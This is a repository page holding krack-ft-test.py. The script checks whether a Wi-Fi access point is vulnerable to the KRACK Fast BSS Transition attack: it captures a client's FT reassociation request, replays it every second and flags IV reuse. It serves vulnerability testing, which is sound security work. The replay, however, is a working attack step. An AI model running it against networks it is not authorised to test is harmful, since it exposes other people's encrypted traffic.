Home Explore Help
Register Sign In
wareck
/
krackattacks
1
0
Fork 0
Files Issues 0 Pull Requests 0 Wiki
Tree: 4b78669686
Branches Tags
krackattacks
/
krackattack
/
krack-ft-test.py

krack-ft-test.py 6.1 KB
History Raw

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170 
  1. #!/usr/bin/env python3
    2. 

  2. 

  3. # Copyright (c) 2017-2021, Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
    4. 

  4. #
    5. 

  5. # This code may be distributed under the terms of the BSD license.
    6. 

  6. # See LICENSE for more details.
    7. 

  7. 

  8. import logging
    9. 

  9. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
    10. 

  10. from scapy.all import *
    11. 

  11. from libwifi import *
    12. 

  12. import sys, socket, struct, time, subprocess, atexit, select
    13. 

  13. 

  14. #TODO: - Merge code with client tests to avoid code duplication (including some error handling)
    15. 

  15. #TODO: - Option to use a secondary interface for injection + WARNING if a virtual interface is used + repeat advice to disable hardware encryption
    16. 

  16. #TODO: - Test whether injection works on the virtual interface (send probe requests to nearby AP and wait for replies)
    17. 

  17. 

  18. #### Man-in-the-middle Code ####
    19. 

  19. 

  20. class KRAckAttackFt():
    21. 

  21. 	def __init__(self, interface):
    22. 

  22. 		self.nic_iface = interface
    23. 

  23. 		self.nic_mon = interface + "mon"
    24. 

  24. 		self.clientmac = scapy.arch.get_if_hwaddr(interface)
    25. 

  25. 

  26. 		self.sock  = None
    27. 

  27. 		self.wpasupp = None
    28. 

  28. 

  29. 		self.reset_client()
    30. 

  30. 

  31. 	def reset_client(self):
    32. 

  32. 		self.reassoc = None
    33. 

  33. 		self.ivs = IvCollection()
    34. 

  34. 		self.next_replay = None
    35. 

  35. 

  36. 	def start_replay(self, p):
    37. 

  37. 		assert Dot11ReassoReq in p
    38. 

  38. 		self.reassoc = p
    39. 

  39. 		self.next_replay = time.time() + 1
    40. 

  40. 

  41. 	def process_frame(self, p):
    42. 

  42. 		# Detect whether hardware encryption is decrypting the frame, *and* removing the TKIP/CCMP
    43. 

  43. 		# header of the (now decrypted) frame.
    44. 

  44. 		# FIXME: Put this check in MitmSocket? We want to check this in client tests as well!
    45. 

  45. 		if self.clientmac in [p.addr1, p.addr2] and Dot11WEP in p:
    46. 

  46. 			# If the hardware adds/removes the TKIP/CCMP header, this is where the plaintext starts
    47. 

  47. 			payload = get_ccmp_payload(p)
    48. 

  48. 

  49. 			# Check if it's indeed a common LCC/SNAP plaintext header of encrypted frames, and
    50. 

  50. 			# *not* the header of a plaintext EAPOL handshake frame
    51. 

  51. 			if payload.startswith(b"\xAA\xAA\x03\x00\x00\x00") and not payload.startswith(b"\xAA\xAA\x03\x00\x00\x00\x88\x8e"):
    52. 

  52. 				log(ERROR, "ERROR: Virtual monitor interface doesn't seem to pass 802.11 encryption header to userland.")
    53. 

  53. 				log(ERROR, "   Try to disable hardware encryption, or use a 2nd interface for injection.", showtime=False)
    54. 

  54. 				quit(1)
    55. 

  55. 

  56. 		# Client performing a (possible new) handshake
    57. 

  57. 		if self.clientmac in [p.addr1, p.addr2] and Dot11Auth in p:
    58. 

  58. 			self.reset_client()
    59. 

  59. 			log(INFO, "Detected Authentication frame, clearing client state")
    60. 

  60. 		elif p.addr2 == self.clientmac and Dot11ReassoReq in p:
    61. 

  61. 			self.reset_client()
    62. 

  62. 			if get_element(p, IEEE_TLV_TYPE_RSN) and get_element(p, IEEE_TLV_TYPE_FT):
    63. 

  63. 				log(INFO, "Detected FT reassociation frame")
    64. 

  64. 				self.start_replay(p)
    65. 

  65. 			else:
    66. 

  66. 				log(INFO, "Reassociation frame does not appear to be an FT one")
    67. 

  67. 		elif p.addr2 == self.clientmac and Dot11AssoReq in p:
    68. 

  68. 			log(INFO, "Detected normal association frame")
    69. 

  69. 			self.reset_client()
    70. 

  70. 

  71. 		# Encrypted data sent to the client
    72. 

  72. 		elif p.addr1 == self.clientmac and dot11_is_encrypted_data(p):
    73. 

  73. 			iv = dot11_get_iv(p)
    74. 

  74. 			log(INFO, "AP transmitted data using IV=%d (seq=%d)" % (iv, dot11_get_seqnum(p)))
    75. 

  75. 			if self.ivs.is_iv_reused(p):
    76. 

  76. 				log(INFO, ("IV reuse detected (IV=%d, seq=%d). " +
    77. 

  77. 					"AP is vulnerable!") % (iv, dot11_get_seqnum(p)), color="green")
    78. 

  78. 

  79. 			self.ivs.track_used_iv(p)
    80. 

  80. 

  81. 	def handle_rx(self):
    82. 

  82. 		p = self.sock.recv()
    83. 

  83. 		if p == None: return
    84. 

  84. 

  85. 		self.process_frame(p)
    86. 

  86. 

  87. 	def configure_interfaces(self):
    88. 

  88. 		log(STATUS, "Note: disable Wi-Fi in your network manager so it doesn't interfere with this script")
    89. 

  89. 

  90. 		# 0. Some users may forget this otherwise
    91. 

  91. 		subprocess.check_output(["rfkill", "unblock", "wifi"])
    92. 

  92. 

  93. 		# 1. Remove unused virtual interfaces to start from a clean state
    94. 

  94. 		subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
    95. 

  95. 

  96. 		# 2. Configure monitor mode on interfaces
    97. 

  97. 		subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
    98. 

  98. 		# Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
    99. 

  99. 		# sequence of commands assures the virtual interface is properly registered as a 802.11 monitor interface.
    100. 

  100. 		subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
    101. 

  101. 		time.sleep(0.5)
    102. 

  102. 		subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
    103. 

  103. 		subprocess.check_output(["ifconfig", self.nic_mon, "up"])
    104. 

  104. 

  105. 	def run(self):
    106. 

  106. 		self.configure_interfaces()
    107. 

  107. 

  108. 		self.sock = MitmSocket(type=ETH_P_ALL, iface=self.nic_mon)
    109. 

  109. 

  110. 		# Open the wpa_supplicant client that will connect to the network that will be tested
    111. 

  111. 		self.wpasupp = subprocess.Popen(sys.argv[1:])
    112. 

  112. 

  113. 		# Monitor the virtual monitor interface of the client and perform the needed actions
    114. 

  114. 		while True:
    115. 

  115. 			sel = select.select([self.sock], [], [], 1)
    116. 

  116. 			if self.sock in sel[0]: self.handle_rx()
    117. 

  117. 

  118. 			if self.reassoc and time.time() > self.next_replay:
    119. 

  119. 				log(INFO, "Replaying Reassociation Request")
    120. 

  120. 				self.sock.send(self.reassoc)
    121. 

  121. 				self.next_replay = time.time() + 1
    122. 

  122. 

  123. 	def stop(self):
    124. 

  124. 		log(STATUS, "Closing wpa_supplicant and cleaning up ...")
    125. 

  125. 		if self.wpasupp:
    126. 

  126. 			self.wpasupp.terminate()
    127. 

  127. 			self.wpasupp.wait()
    128. 

  128. 		if self.sock: self.sock.close()
    129. 

  129. 

  130. 

  131. def cleanup():
    132. 

  132. 	attack.stop()
    133. 

  133. 

  134. def argv_get_interface():
    135. 

  135. 	for i in range(len(sys.argv)):
    136. 

  136. 		if not sys.argv[i].startswith("-i"):
    137. 

  137. 			continue
    138. 

  138. 		if len(sys.argv[i]) > 2:
    139. 

  139. 			return sys.argv[i][2:]
    140. 

  140. 		else:
    141. 

  141. 			return sys.argv[i + 1]
    142. 

  142. 

  143. 	return None
    144. 

  144. 

  145. def get_expected_scapy_ver():
    146. 

  146. 	for line in open("requirements.txt"):
    147. 

  147. 		if line.startswith("scapy=="):
    148. 

  148. 			return line[7:].strip()
    149. 

  149. 	return None
    150. 

  150. 

  151. if __name__ == "__main__":
    152. 

  152. 	if len(sys.argv) <= 1 or "--help" in sys.argv or "-h" in sys.argv:
    153. 

  153. 		print("See README.md for instructions on how to use this script")
    154. 

  154. 		quit(1)
    155. 

  155. 

  156. 	# Check if we're using the expected scapy version
    157. 

  157. 	expected_ver = get_expected_scapy_ver()
    158. 

  158. 	if expected_ver!= None and scapy.VERSION != expected_ver:
    159. 

  159. 		log(WARNING, "You are using scapy version {} instead of the expected {}".format(scapy.VERSION, expected_ver))
    160. 

  160. 		log(WARNING, "Are you executing the script from inside the correct python virtual environment?")
    161. 

  161. 

  162. 	# TODO: Verify that we only accept CCMP?
    163. 

  163. 	interface = argv_get_interface()
    164. 

  164. 	if not interface:
    165. 

  165. 		log(ERROR, "Failed to determine wireless interface. Specify one using the -i parameter.")
    166. 

  166. 		quit(1)
    167. 

  167. 

  168. 	attack = KRAckAttackFt(interface)
    169. 

  169. 	atexit.register(cleanup)
    170. 

  170. 	attack.run()
    171.